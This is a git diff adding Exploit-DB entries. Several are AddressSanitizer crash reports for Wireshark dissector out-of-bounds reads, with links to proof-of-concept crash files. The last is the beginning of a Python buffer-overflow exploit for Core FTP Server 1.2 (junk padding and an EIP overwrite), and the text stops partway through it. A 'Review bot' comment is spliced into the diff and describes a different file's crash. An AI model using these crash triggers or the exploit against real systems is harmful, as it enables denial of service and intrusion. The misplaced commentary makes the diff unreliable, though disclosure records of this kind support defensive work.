wireshark/epan/packet.c:616:8
+ #18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
+ #42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps
wireshark/epan/epan.c:373:2
+ #43 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #45 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
+Shadow bytes around the buggy address:
+ 0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
+ 0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
+ 0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==5092==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39482.zip
+
diff --git a/platforms/multiple/dos/39483.txt b/platforms/multiple/dos/39483.txt
new file mode 100755
index 000000000..8c073868c
--- /dev/null
+++ b/platforms/multiple/dos/39483.txt
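Review bot: The report pins neither an affected release range nor the fixing change — the only version statement is "current git master" — so a reader of this copy cannot tell which shipped Wireshark builds are exposed; the Proof of Concept section should at least record the outcome of the cited ticket (https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825 is referenced but not its resolution) and the first release that carries the fix. What the ASAN output establishes is a 4-byte read landing exactly at the end of the 2040-byte static table `nm_att_tlvdef_base` from `dissect_oml_attrs` (packet-gsm_abis_oml.c:1544), which is consistent with a packet-derived index stepping one entry past the table — presumably the OML attribute tag, to be confirmed against the ticket; as an over-read of global memory the realistic outcome is a dissector crash or disclosure of adjacent .data rather than code execution, so the `dos` classification in files.csv is the right one and a sentence saying so would help triage. The closing line says "Attached are three files which trigger the crash" but the files are reachable only through the external `39482.zip` link, so the sentence should name the archive rather than imply in-line attachments.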
@@ -0,0 +1,74 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=654
+
+The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
+READ of size 4 at 0x7fd688698b10 thread T0
+ #0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
+ #1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
+ #2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
+ #3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
+ #4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
+ #5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
+ #6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
+ #7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
+ #13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
+ #14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
+ #16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #17 0x5264eb in process_packet wireshark/tshark.c:3728:5
+ #18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+ #19 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7fd688698b10 is located 48 bytes to the left of global variable '' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
+ '' is ascii string 'Average Signal to Noise Ratio'
+0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
+Shadow bytes around the buggy address:
+ 0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
+ 0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
+ 0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
+ 0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
+ 0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
+ 0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
+ 0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
+ 0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
+ 0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==32475==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39483.zip
+
diff --git a/platforms/multiple/dos/39484.txt b/platforms/multiple/dos/39484.txt
new file mode 100755
index 000000000..e1e9ca57c
--- /dev/null
+++ b/platforms/multiple/dos/39484.txt
@@ -0,0 +1,141 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=648
+
+The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
+READ of size 8 at 0x000005676c18 thread T0
+ #0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
+ #1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
+ #2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
+ #4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
+ #6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
+ #8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
+ #9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
+ #10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
+ #11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
+ #12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
+ #13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+ #14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
+ #15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
+ #16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
+ #17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
+ #18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
+ #19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
+ #25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
+ #29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
+ #30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
+ #31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
+ #32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
+ #33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
+ #38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
+ #39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
+ #44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
+ #45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
+ #46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
+ #47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
+ #48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
+ #49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
+ #53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
+ #54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
+ #55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
+ #56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
+ #57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
+ #58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+ #62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+ #63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
+ #67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+ #68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+ #73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+ #74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+ #77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+ #78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+ #79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
+ #80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
+ #81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
+ #82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
+ #83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+ #84 0x53c91b in process_packet wireshark/tshark.c:3728:5
+ #85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
+ #86 0x52c1df in main wireshark/tshark.c:2197:13
+
+0x000005676c18 is located 8 bytes to the left of global variable '' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
+ '' is ascii string 'queryWithPerm '
+0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
+Shadow bytes around the buggy address:
+ 0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
+ 0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
+ 0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
+ 0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
+ 0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
+ 0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+ 0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Heap right redzone: fb
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack partial redzone: f4
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+==7855==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39484.zip
+
diff --git a/platforms/windows/local/39480.py b/platforms/windows/local/39480.py
new file mode 100755
index 000000000..c9330a848
--- /dev/null
+++ b/platforms/windows/local/39480.py
@@ -0,0 +1,77 @@
+#-*- coding: utf-8 -*-
+#
+# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
+# Date: 2016-02-22
+# Author: INSECT.B
+# Facebook : https://www.facebook.com/B.INSECT00
+# GitHub : binsect00
+# Blog : http://binsect00.tistory.com
+# Vendor Homepage : http://www.coreftp.com/
+# Software Link:
+# Version: 1.2
+# Tested on: Windows7 Professional SP1 En x86
+# CVE : N/A
+
+'''
+[+] Type : Buffer overflow
+[+] Detail :
+[-] The vulnerability has the most typical Buffer overflow vulnerabilities.
+[-] Insert string into 'Log filename(include path)' field that [setup] - [new] - [Logging options] - [More]
+[-] 'Log filename(include path)' field is no limit to the length and does not check the length
+[-] Insert string "A"*1500 and press Ok, OK
+[-] crash info
+(3bc.e28): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
+eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
+41414141 ?? ???
+'''
+import struct
+
+junk = "A" * 312
+EIP = struct.pack("